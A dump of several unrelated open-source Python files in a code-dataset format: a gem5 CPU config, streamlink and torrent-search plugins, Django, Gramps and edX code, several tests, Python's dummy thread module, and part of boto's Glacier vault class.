# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Kevin Lim
from m5.SimObject import SimObject
from m5.params import *
from FuncUnit import *
from FuncUnitConfig import *
class FUPool(SimObject):
type = 'FUPool'
cxx_header = "cpu/o3/fu_pool.hh"
FUList = VectorParam.FUDesc("list of FU's for this pool")
class DefaultFUPool(FUPool):
FUList = [ IntALU(), IntMultDiv(), FP_ALU(), FP_MultDiv(), ReadPort(),
SIMD_Unit(), WritePort(), RdWrPort(), IprPort() ]
| bsd-3-clause |
mmetak/streamlink | src/streamlink/plugins/aftonbladet.py | 2 | 3010 | """Plugin for the Swedish newspaper Aftonbladet's streaming service."""
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http, validate
from streamlink.stream import HDSStream, HLSStream
PLAYLIST_URL_FORMAT = "http://{address}/{path}/{filename}"
STREAM_TYPES = {
"hds": HDSStream.parse_manifest,
"hls": HLSStream.parse_variant_playlist
}
STREAM_FORMATS = ("m3u8", "f4m")
VIDEO_INFO_URL = "http://aftonbladet-play-static-ext.cdn.drvideo.aptoma.no/actions/video"
METADATA_URL = "http://aftonbladet-play-metadata.cdn.drvideo.aptoma.no/video/{0}.json"
_embed_re = re.compile(r"<iframe src=\"(http://tv.aftonbladet.se[^\"]+)\"")
_aptoma_id_re = re.compile(r"<div id=\"drvideo\".+data-aptomaId=\"([^\"]+)\"")
_live_re = re.compile(r"data-isLive=\"true\"")
_url_re = re.compile(r"http(s)?://(\w+.)?.aftonbladet.se")
_video_schema = validate.Schema(
{
"formats": validate.all(
{
validate.text: {
validate.text: validate.all(
dict,
validate.filter(lambda k, v: k in STREAM_FORMATS),
{
validate.text: [{
"address": validate.text,
"filename": validate.text,
"path": validate.text
}]
},
)
}
},
validate.filter(lambda k, v: k in STREAM_TYPES)
)
}
)
class Aftonbladet(Plugin):
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url)
def _get_streams(self):
res = http.get(self.url)
match = _embed_re.search(res.text)
if match:
res = http.get(match.group(1))
match = _aptoma_id_re.search(res.text)
if not match:
return
aptoma_id = match.group(1)
if not _live_re.search(res.text):
res = http.get(METADATA_URL.format(aptoma_id))
metadata = http.json(res)
video_id = metadata["videoId"]
else:
video_id = aptoma_id
res = http.get(VIDEO_INFO_URL, params=dict(id=video_id))
video = http.json(res, schema=_video_schema)
streams = {}
for fmt, providers in video["formats"].items():
for name, provider in providers.items():
for ext, playlists in provider.items():
for playlist in playlists:
url = PLAYLIST_URL_FORMAT.format(**playlist)
parser = STREAM_TYPES[fmt]
try:
streams.update(parser(self.session, url))
except IOError as err:
self.logger.error("Failed to extract {0} streams: {1}",
fmt.upper(), err)
return streams
__plugin__ = Aftonbladet
| bsd-2-clause |
sillywilly42/simian | src/tests/simian/mac/munki/handlers/catalogs_test.py | 1 | 1886 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Munki catalogs module tests."""
import httplib
import logging
from google.apputils import app
from tests.simian.mac.common import test
from simian.mac.munki.handlers import catalogs
class CatalogsHandlersTest(test.RequestHandlerTest):
def GetTestClassInstance(self):
return catalogs.Catalogs()
def GetTestClassModule(self):
return catalogs
def testGetSuccess(self):
"""Tests Catalogs.get()."""
name = 'goodname'
self.MockDoAnyAuth()
catalog = self.MockModelStatic(
'Catalog', 'MemcacheWrappedGet', name, 'plist_xml')
self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'
self.response.out.write(catalog).AndReturn(None)
self.mox.ReplayAll()
self.c.get(name)
self.mox.VerifyAll()
def testGet404(self):
"""Tests Catalogs.get() where name is not found."""
name = 'badname'
self.MockDoAnyAuth()
self.MockModelStaticBase(
'Catalog', 'MemcacheWrappedGet', name, 'plist_xml').AndReturn(None)
self.response.set_status(httplib.NOT_FOUND).AndReturn(None)
self.mox.ReplayAll()
self.c.get(name)
self.mox.VerifyAll()
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
test.main(unused_argv)
if __name__ == '__main__':
app.run()
| apache-2.0 |
pmghalvorsen/gramps_branch | gramps/gui/selectors/selectcitation.py | 2 | 2470 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2003-2006 Donald N. Allingham
# 2009 Gary Burton
# Copyright (C) 2011 Tim G L Lyons, Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
SelectCitation class for GRAMPS.
"""
#-------------------------------------------------------------------------
#
# internationalization
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from ..views.treemodels import CitationTreeModel
from .baseselector import BaseSelector
#-------------------------------------------------------------------------
#
# SelectSource
#
#-------------------------------------------------------------------------
class SelectCitation(BaseSelector):
def _local_init(self):
"""
Perform local initialisation for this class
"""
self.width_key = 'interface.source-sel-width'
self.height_key = 'interface.source-sel-height'
def get_window_title(self):
return _("Select Source or Citation")
def get_model_class(self):
return CitationTreeModel
def get_column_titles(self):
return [
(_('Source: Title or Citation: Volume/Page'), 350, BaseSelector.TEXT, 0),
(_('ID'), 75, BaseSelector.TEXT, 1),
(_('Last Change'), 150, BaseSelector.TEXT, 6),
]
def get_from_handle_func(self):
return self.db.get_source_from_handle
def get_from_handle_func2(self):
return self.db.get_citation_from_handle
| gpl-2.0 |
tttthemanCorp/CardmeleonAppEngine | django/contrib/staticfiles/management/commands/runserver.py | 163 | 1264 | from optparse import make_option
from django.conf import settings
from django.core.management.commands.runserver import BaseRunserverCommand
from django.contrib.staticfiles.handlers import StaticFilesHandler
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--nostatic', action="store_false", dest='use_static_handler', default=True,
help='Tells Django to NOT automatically serve static files at STATIC_URL.'),
make_option('--insecure', action="store_true", dest='insecure_serving', default=False,
help='Allows serving static files even if DEBUG is False.'),
)
help = "Starts a lightweight Web server for development and also serves static files."
def get_handler(self, *args, **options):
"""
Returns the static files serving handler.
"""
handler = super(Command, self).get_handler(*args, **options)
use_static_handler = options.get('use_static_handler', True)
insecure_serving = options.get('insecure_serving', False)
if (settings.DEBUG and use_static_handler or
(use_static_handler and insecure_serving)):
handler = StaticFilesHandler(handler)
return handler
| bsd-3-clause |
Hellowlol/PyTunes | libs/engines/other/piratebay.py | 1 | 4507 | #VERSION: 1.53
#AUTHORS: Fabien Devaux ([email protected])
#CONTRIBUTORS: Christophe Dumez ([email protected])
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from novaprinter import prettyPrinter
import sgmllib
from helpers import retrieve_url, download_file
PREVIOUS_IDS = set()
class piratebay(object):
url = 'https://thepiratebay.se'
name = 'The Pirate Bay'
supported_categories = {'all': '0', 'movies': '200', 'music': '100', 'games': '400', 'software': '300'}
def __init__(self):
self.results = []
self.parser = self.SimpleSGMLParser(self.results, self.url)
def download_torrent(self, info):
print download_file(info)
class SimpleSGMLParser(sgmllib.SGMLParser):
def __init__(self, results, url, *args):
sgmllib.SGMLParser.__init__(self)
self.td_counter = None
self.current_item = None
self.results = results
self.url = url
self.code = 0
self.in_name = None
def start_a(self, attr):
params = dict(attr)
if params['href'].startswith('/torrent/'):
self.current_item = {}
self.td_counter = 0
self.current_item['desc_link'] = self.url + params['href'].strip()
self.in_name = True
self.current_item['id'] = params['href'].split('/')[2]
elif params['href'].startswith('magnet:'):
self.current_item['link']=params['href'].strip()
self.in_name = False
def handle_data(self, data):
if self.td_counter == 0:
if self.in_name:
if not self.current_item.has_key('name'):
self.current_item['name'] = ''
self.current_item['name']+= data.strip()
else:
#Parse size
if 'Size' in data:
self.current_item['size'] = data[data.index("Size")+5:]
self.current_item['size'] = self.current_item['size'][:self.current_item['size'].index(',')]
elif self.td_counter == 1:
if not self.current_item.has_key('seeds'):
self.current_item['seeds'] = ''
self.current_item['seeds']+= data.strip()
elif self.td_counter == 2:
if not self.current_item.has_key('leech'):
self.current_item['leech'] = ''
self.current_item['leech']+= data.strip()
def start_td(self,attr):
if isinstance(self.td_counter,int):
self.td_counter += 1
if self.td_counter > 3:
self.td_counter = None
# Display item
if self.current_item:
if self.current_item['id'] in PREVIOUS_IDS:
self.results = []
self.reset()
return
self.current_item['engine_url'] = self.url
if not self.current_item['seeds'].isdigit():
self.current_item['seeds'] = 0
if not self.current_item['leech'].isdigit():
self.current_item['leech'] = 0
prettyPrinter(self.current_item)
PREVIOUS_IDS.add(self.current_item['id'])
self.results.append('a')
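# Fetch up to 11 result pages, stopping early once a page yields no new results.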
def search(self, what, cat='all'):
ret = []
i = 0
order = 'se'
while i < 11:
results = []
parser = self.SimpleSGMLParser(results, self.url)
dat = retrieve_url(self.url+'/search/%s/%d/7/%s' % (what, i, self.supported_categories[cat]))
parser.feed(dat)
parser.close()
if len(results) <= 0:
break
i += 1
| gpl-3.0 |
mfalesni/cfme_tests | cfme/tests/test_db_restore.py | 2 | 3688 | import fauxfactory
import pytest
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.common.vm import VM
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from fixtures.pytest_store import store
from cfme.utils.log import logger
from cfme.utils.providers import list_providers_by_class
def provider_app_crud(provider_class, appliance):
try:
prov = list_providers_by_class(provider_class)[0]
prov.appliance = appliance
return prov
except IndexError:
pytest.skip("No {} providers available (required)".format(provider_class.type))
def provision_vm(request, provider):
"""Function to provision appliance to the provider being tested"""
vm_name = "test_rest_db_" + fauxfactory.gen_alphanumeric()
vm = VM.factory(vm_name, provider)
request.addfinalizer(vm.delete_from_provider)
if not provider.mgmt.does_vm_exist(vm_name):
logger.info("deploying %s on provider %s", vm_name, provider.key)
vm.create_on_provider(allow_skip="default")
else:
logger.info("recycling deployed vm %s on provider %s", vm_name, provider.key)
vm.provider.refresh_provider_relationships()
return vm
@pytest.fixture(scope="module")
def get_appliances(temp_appliances_unconfig_modscope_rhevm):
"""Returns two database-owning appliances
"""
appl1 = temp_appliances_unconfig_modscope_rhevm[0]
appl2 = temp_appliances_unconfig_modscope_rhevm[1]
appl1.configure(region=0)
appl1.wait_for_web_ui()
appl2.configure(region=0)
appl2.wait_for_web_ui()
return temp_appliances_unconfig_modscope_rhevm
# TODO: Refactor test into fixtures
@pytest.mark.tier(2)
@pytest.mark.uncollectif(
lambda: not store.current_appliance.is_downstream)
def test_db_restore(request, soft_assert, get_appliances):
appl1, appl2 = get_appliances
# Manage infra,cloud providers and set some roles before taking a DB backup
server_info = appl1.server.settings
server_info.enable_server_roles('automate')
roles = server_info.server_roles_db
provider_app_crud(VMwareProvider, appl1).setup()
provider_app_crud(EC2Provider, appl1).setup()
appl1.db.backup()
# Fetch v2_key and DB backup from the first appliance
rand_filename = "/tmp/v2_key_{}".format(fauxfactory.gen_alphanumeric())
appl1.ssh_client.get_file("/var/www/miq/vmdb/certs/v2_key", rand_filename)
dump_filename = "/tmp/db_dump_{}".format(fauxfactory.gen_alphanumeric())
appl1.ssh_client.get_file("/tmp/evm_db.backup", dump_filename)
# Push v2_key and DB backup to second appliance
appl2.ssh_client.put_file(rand_filename, "/var/www/miq/vmdb/certs/v2_key")
appl2.ssh_client.put_file(dump_filename, "/tmp/evm_db.backup")
# Restore DB on the second appliance
appl2.evmserverd.stop()
appl2.db.drop()
appl2.db.restore()
appl2.start_evm_service()
appl2.wait_for_web_ui()
# Assert providers on the second appliance
assert set(appl2.managed_provider_names) == set(appl1.managed_provider_names), (
'Restored DB is missing some providers'
)
# Verify that existing provider can detect new VMs on the second appliance
virtual_crud = provider_app_crud(VMwareProvider, appl2)
vm = provision_vm(request, virtual_crud)
soft_assert(vm.provider.mgmt.is_vm_running(vm.name), "vm running")
# Assert server roles on the second appliance
for role, is_enabled in server_info.server_roles_ui.iteritems():
if is_enabled:
assert roles[role], "Role '{}' is selected but should not be".format(role)
else:
assert not roles[role], "Role '{}' is not selected but should be".format(role)
| gpl-2.0 |
defance/edx-platform | openedx/core/lib/api/tests/test_exceptions.py | 11 | 2703 | """
Test Custom Exceptions
"""
import ddt
from django.test import TestCase
from rest_framework import exceptions as drf_exceptions
from .. import exceptions
@ddt.ddt
class TestDictExceptionsAllowDictDetails(TestCase):
"""
Standard DRF exceptions coerce detail inputs to strings. We want to use
dicts to allow better customization of error messages. Demonstrate that
we can provide dictionaries as exception details, and that custom
classes subclass the relevant DRF exceptions, to provide consistent
exception catching behavior.
"""
def test_drf_errors_coerce_strings(self):
# Demonstrate the base issue we are trying to solve.
exc = drf_exceptions.AuthenticationFailed({u'error_code': -1})
self.assertEqual(exc.detail, u"{u'error_code': -1}")
@ddt.data(
exceptions.AuthenticationFailed,
exceptions.NotAuthenticated,
exceptions.NotFound,
exceptions.ParseError,
exceptions.PermissionDenied,
)
def test_exceptions_allows_dict_detail(self, exception_class):
exc = exception_class({u'error_code': -1})
self.assertEqual(exc.detail, {u'error_code': -1})
def test_method_not_allowed_allows_dict_detail(self):
exc = exceptions.MethodNotAllowed(u'POST', {u'error_code': -1})
self.assertEqual(exc.detail, {u'error_code': -1})
def test_not_acceptable_allows_dict_detail(self):
exc = exceptions.NotAcceptable({u'error_code': -1}, available_renderers=['application/json'])
self.assertEqual(exc.detail, {u'error_code': -1})
self.assertEqual(exc.available_renderers, ['application/json'])
@ddt.ddt
class TestDictExceptionSubclassing(TestCase):
"""
Custom exceptions should subclass standard DRF exceptions, so code that
catches the DRF exceptions also catches ours.
"""
@ddt.data(
(exceptions.AuthenticationFailed, drf_exceptions.AuthenticationFailed),
(exceptions.NotAcceptable, drf_exceptions.NotAcceptable),
(exceptions.NotAuthenticated, drf_exceptions.NotAuthenticated),
(exceptions.NotFound, drf_exceptions.NotFound),
(exceptions.ParseError, drf_exceptions.ParseError),
(exceptions.PermissionDenied, drf_exceptions.PermissionDenied),
)
@ddt.unpack
def test_exceptions_subclass_drf_exceptions(self, exception_class, drf_exception_class):
exc = exception_class({u'error_code': -1})
self.assertIsInstance(exc, drf_exception_class)
def test_method_not_allowed_subclasses_drf_exception(self):
exc = exceptions.MethodNotAllowed(u'POST', {u'error_code': -1})
self.assertIsInstance(exc, drf_exceptions.MethodNotAllowed)
| agpl-3.0 |
craigderington/studentloan5 | studentloan5/Lib/_dummy_thread.py | 106 | 4872 | """Drop-in replacement for the thread module.
Meant to be used as a brain-dead substitute so that threaded code does
not need to be rewritten for when the thread module is not present.
Suggested usage is::
try:
import _thread
except ImportError:
import _dummy_thread as _thread
"""
# Exports only things specified by thread documentation;
# skipping obsolete synonyms allocate(), start_new(), exit_thread().
__all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock',
'interrupt_main', 'LockType']
# A dummy value
TIMEOUT_MAX = 2**31
# NOTE: this module can be imported early in the extension building process,
# and so top level imports of other modules should be avoided. Instead, all
# imports are done when needed on a function-by-function basis. Since threads
# are disabled, the import lock should not be an issue anyway (??).
error = RuntimeError
def start_new_thread(function, args, kwargs={}):
"""Dummy implementation of _thread.start_new_thread().
Compatibility is maintained by making sure that ``args`` is a
tuple and ``kwargs`` is a dictionary. If an exception is raised
and it is SystemExit (which can be done by _thread.exit()) it is
caught and nothing is done; all other exceptions are printed out
by using traceback.print_exc().
If the executed function calls interrupt_main the KeyboardInterrupt will be
raised when the function returns.
"""
if type(args) != type(tuple()):
raise TypeError("2nd arg must be a tuple")
if type(kwargs) != type(dict()):
raise TypeError("3rd arg must be a dict")
global _main
_main = False
try:
function(*args, **kwargs)
except SystemExit:
pass
except:
import traceback
traceback.print_exc()
_main = True
global _interrupt
if _interrupt:
_interrupt = False
raise KeyboardInterrupt
def exit():
"""Dummy implementation of _thread.exit()."""
raise SystemExit
def get_ident():
"""Dummy implementation of _thread.get_ident().
Since this module should only be used when _threadmodule is not
available, it is safe to assume that the current process is the
only thread. Thus a constant can be safely returned.
"""
return -1
def allocate_lock():
"""Dummy implementation of _thread.allocate_lock()."""
return LockType()
def stack_size(size=None):
"""Dummy implementation of _thread.stack_size()."""
if size is not None:
raise error("setting thread stack size not supported")
return 0
def _set_sentinel():
"""Dummy implementation of _thread._set_sentinel()."""
return LockType()
class LockType(object):
"""Class implementing dummy implementation of _thread.LockType.
Compatibility is maintained by maintaining self.locked_status
which is a boolean that stores the state of the lock. Pickling of
the lock, though, should not be done since if the _thread module is
then used with an unpickled ``lock()`` from here problems could
occur from this class not having atomic methods.
"""
def __init__(self):
self.locked_status = False
def acquire(self, waitflag=None, timeout=-1):
"""Dummy implementation of acquire().
For blocking calls, self.locked_status is automatically set to
True and returned appropriately based on value of
``waitflag``. If it is non-blocking, then the value is
actually checked and not set if it is already acquired. This
is all done so that threading.Condition's assert statements
aren't triggered and throw a little fit.
"""
if waitflag is None or waitflag:
self.locked_status = True
return True
else:
if not self.locked_status:
self.locked_status = True
return True
else:
if timeout > 0:
import time
time.sleep(timeout)
return False
__enter__ = acquire
def __exit__(self, typ, val, tb):
self.release()
def release(self):
"""Release the dummy lock."""
# XXX Perhaps shouldn't actually bother to test? Could lead
# to problems for complex, threaded code.
if not self.locked_status:
raise error
self.locked_status = False
return True
def locked(self):
return self.locked_status
# Used to signal that interrupt_main was called in a "thread"
_interrupt = False
# True when not executing in a "thread"
_main = True
def interrupt_main():
"""Set _interrupt flag to True to have start_new_thread raise
KeyboardInterrupt upon exiting."""
if _main:
raise KeyboardInterrupt
else:
global _interrupt
_interrupt = True
| bsd-3-clause |
rahul67/hue | desktop/core/ext-py/boto-2.38.0/boto/glacier/vault.py | 153 | 17601 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Thomas Parslow http://almostobsolete.net/
# Copyright (c) 2012 Robie Basak <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import codecs
from boto.glacier.exceptions import UploadArchiveError
from boto.glacier.job import Job
from boto.glacier.writer import compute_hashes_from_fileobj, \
resume_file_upload, Writer
from boto.glacier.concurrent import ConcurrentUploader
from boto.glacier.utils import minimum_part_size, DEFAULT_PART_SIZE
import os.path
_MEGABYTE = 1024 * 1024
_GIGABYTE = 1024 * _MEGABYTE
MAXIMUM_ARCHIVE_SIZE = 10000 * 4 * _GIGABYTE
MAXIMUM_NUMBER_OF_PARTS = 10000
class Vault(object):
DefaultPartSize = DEFAULT_PART_SIZE
SingleOperationThreshold = 100 * _MEGABYTE
ResponseDataElements = (('VaultName', 'name', None),
('VaultARN', 'arn', None),
('CreationDate', 'creation_date', None),
('LastInventoryDate', 'last_inventory_date', None),
('SizeInBytes', 'size', 0),
('NumberOfArchives', 'number_of_archives', 0))
def __init__(self, layer1, response_data=None):
self.layer1 = layer1
if response_data:
for response_name, attr_name, default in self.ResponseDataElements:
value = response_data[response_name]
setattr(self, attr_name, value)
else:
for response_name, attr_name, default in self.ResponseDataElements:
setattr(self, attr_name, default)
def __repr__(self):
return 'Vault("%s")' % self.arn
def delete(self):
"""
Deletes this vault. WARNING!
"""
self.layer1.delete_vault(self.name)
def upload_archive(self, filename, description=None):
"""
Adds an archive to a vault. For archives greater than 100MB the
multipart upload will be used.
:type filename: str
:param filename: A filename to upload
:type description: str
:param description: An optional description for the archive.
:rtype: str
:return: The archive id of the newly created archive
"""
if os.path.getsize(filename) > self.SingleOperationThreshold:
return self.create_archive_from_file(filename, description=description)
return self._upload_archive_single_operation(filename, description)
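# Editor's illustrative sketch: a typical call path for upload_archive()
# via boto's Layer2 interface. The region, vault name and file path are
# hypothetical examples, not values taken from this code base.
#
#     import boto.glacier
#     layer2 = boto.glacier.connect_to_region('us-east-1')
#     vault = layer2.get_vault('my-backups')
#     archive_id = vault.upload_archive('/tmp/backup.tar.gz',
#                                       description='nightly backup')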
def _upload_archive_single_operation(self, filename, description):
"""
Adds an archive to a vault in a single operation. It's recommended for
archives smaller than 100MB.
:type filename: str
:param filename: A filename to upload
:type description: str
:param description: A description for the archive.
:rtype: str
:return: The archive id of the newly created archive
"""
with open(filename, 'rb') as fileobj:
linear_hash, tree_hash = compute_hashes_from_fileobj(fileobj)
fileobj.seek(0)
response = self.layer1.upload_archive(self.name, fileobj,
linear_hash, tree_hash,
description)
return response['ArchiveId']
def create_archive_writer(self, part_size=DefaultPartSize,
description=None):
"""
Create a new archive and begin a multi-part upload to it.
Returns a file-like object to which the data for the archive
can be written. Once all the data is written the file-like
object should be closed; you can then call the get_archive_id
method on it to get the ID of the created archive.
:type part_size: int
:param part_size: The part size for the multipart upload.
:type description: str
:param description: An optional description for the archive.
:rtype: :class:`boto.glacier.writer.Writer`
:return: A Writer object to which the archive data
should be written.
"""
response = self.layer1.initiate_multipart_upload(self.name,
part_size,
description)
return Writer(self, response['UploadId'], part_size=part_size)
def create_archive_from_file(self, filename=None, file_obj=None,
description=None, upload_id_callback=None):
"""
Create a new archive and upload the data from the given file
or file-like object.
:type filename: str
:param filename: A filename to upload
:type file_obj: file
:param file_obj: A file-like object to upload
:type description: str
:param description: An optional description for the archive.
:type upload_id_callback: function
:param upload_id_callback: if set, call with the upload_id as the
only parameter when it becomes known, to enable future calls
to resume_archive_from_file in case resume is needed.
:rtype: str
:return: The archive id of the newly created archive
"""
part_size = self.DefaultPartSize
if not file_obj:
file_size = os.path.getsize(filename)
try:
part_size = minimum_part_size(file_size, part_size)
except ValueError:
raise UploadArchiveError("File size of %s bytes exceeds "
"40,000 GB archive limit of Glacier." % file_size)
file_obj = open(filename, "rb")
writer = self.create_archive_writer(
description=description,
part_size=part_size)
if upload_id_callback:
upload_id_callback(writer.upload_id)
while True:
data = file_obj.read(part_size)
if not data:
break
writer.write(data)
writer.close()
return writer.get_archive_id()
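# Editor's illustrative sketch of the resume workflow described above
# (file name hypothetical): capture the upload id when the upload starts,
# then hand it back to resume_archive_from_file() after a failure.
#
#     saved = {}
#     try:
#         vault.create_archive_from_file(
#             'big-backup.tar',
#             upload_id_callback=lambda uid: saved.setdefault('id', uid))
#     except Exception:
#         if 'id' in saved:
#             vault.resume_archive_from_file(saved['id'],
#                                            filename='big-backup.tar')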
@staticmethod
def _range_string_to_part_index(range_string, part_size):
start, inside_end = [int(value) for value in range_string.split('-')]
end = inside_end + 1
length = end - start
if length == part_size + 1:
# Off-by-one bug in Amazon's Glacier implementation,
# see: https://forums.aws.amazon.com/thread.jspa?threadID=106866
# Workaround: since part_size is too big by one byte, adjust it
end -= 1
inside_end -= 1
length -= 1
assert not (start % part_size), (
"upload part start byte is not on a part boundary")
assert (length <= part_size), "upload part is bigger than part size"
return start // part_size
def resume_archive_from_file(self, upload_id, filename=None,
file_obj=None):
"""Resume upload of a file already part-uploaded to Glacier.
The resumption of an upload where the part-uploaded section is empty
is a valid degenerate case that this function can handle.
One and only one of filename or file_obj must be specified.
:type upload_id: str
:param upload_id: existing Glacier upload id of upload being resumed.
:type filename: str
:param filename: file to open for resume
:type file_obj: file
:param file_obj: file-like object containing local data to resume. This
must read from the start of the entire upload, not just from the
point being resumed. Use file_obj.seek(0) to achieve this if necessary.
:rtype: str
:return: The archive id of the newly created archive
"""
part_list_response = self.list_all_parts(upload_id)
part_size = part_list_response['PartSizeInBytes']
part_hash_map = {}
for part_desc in part_list_response['Parts']:
part_index = self._range_string_to_part_index(
part_desc['RangeInBytes'], part_size)
part_tree_hash = codecs.decode(part_desc['SHA256TreeHash'], 'hex_codec')
part_hash_map[part_index] = part_tree_hash
if not file_obj:
file_obj = open(filename, "rb")
return resume_file_upload(
self, upload_id, part_size, file_obj, part_hash_map)
def concurrent_create_archive_from_file(self, filename, description,
**kwargs):
"""
Create a new archive from a file and upload the given
file.
This is a convenience method around the
:class:`boto.glacier.concurrent.ConcurrentUploader`
class. This method will perform a multipart upload
and upload the parts of the file concurrently.
:type filename: str
:param filename: A filename to upload
:param kwargs: Additional kwargs to pass through to
:py:class:`boto.glacier.concurrent.ConcurrentUploader`.
You can pass any argument besides the ``api`` and
``vault_name`` param (these arguments are already
passed to the ``ConcurrentUploader`` for you).
:raises: `boto.glacier.exceptions.UploadArchiveError` if an error
occurs during the upload process.
:rtype: str
:return: The archive id of the newly created archive
"""
uploader = ConcurrentUploader(self.layer1, self.name, **kwargs)
archive_id = uploader.upload(filename, description)
return archive_id
def retrieve_archive(self, archive_id, sns_topic=None,
description=None):
"""
Initiate an archive retrieval job to download the data from an
archive. You will need to wait for the notification from
Amazon (via SNS) before you can actually download the data;
this typically takes around 4 hours.
:type archive_id: str
:param archive_id: The id of the archive
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the retrieval job.
"""
job_data = {'Type': 'archive-retrieval',
'ArchiveId': archive_id}
if sns_topic is not None:
job_data['SNSTopic'] = sns_topic
if description is not None:
job_data['Description'] = description
response = self.layer1.initiate_job(self.name, job_data)
return self.get_job(response['JobId'])
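# Editor's illustrative sketch of the retrieval flow: initiate the job here,
# wait for the SNS notification (or poll), then download. Job.completed and
# Job.download_to_file are assumed to behave as in boto's glacier.job module;
# the archive id and path are hypothetical.
#
#     job = vault.retrieve_archive(archive_id)
#     # ... several hours later, once job.completed is True ...
#     job.download_to_file('/tmp/restored-archive.tar.gz')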
def retrieve_inventory(self, sns_topic=None,
description=None, byte_range=None,
start_date=None, end_date=None,
limit=None):
"""
Initiate an inventory retrieval job to list the items in the
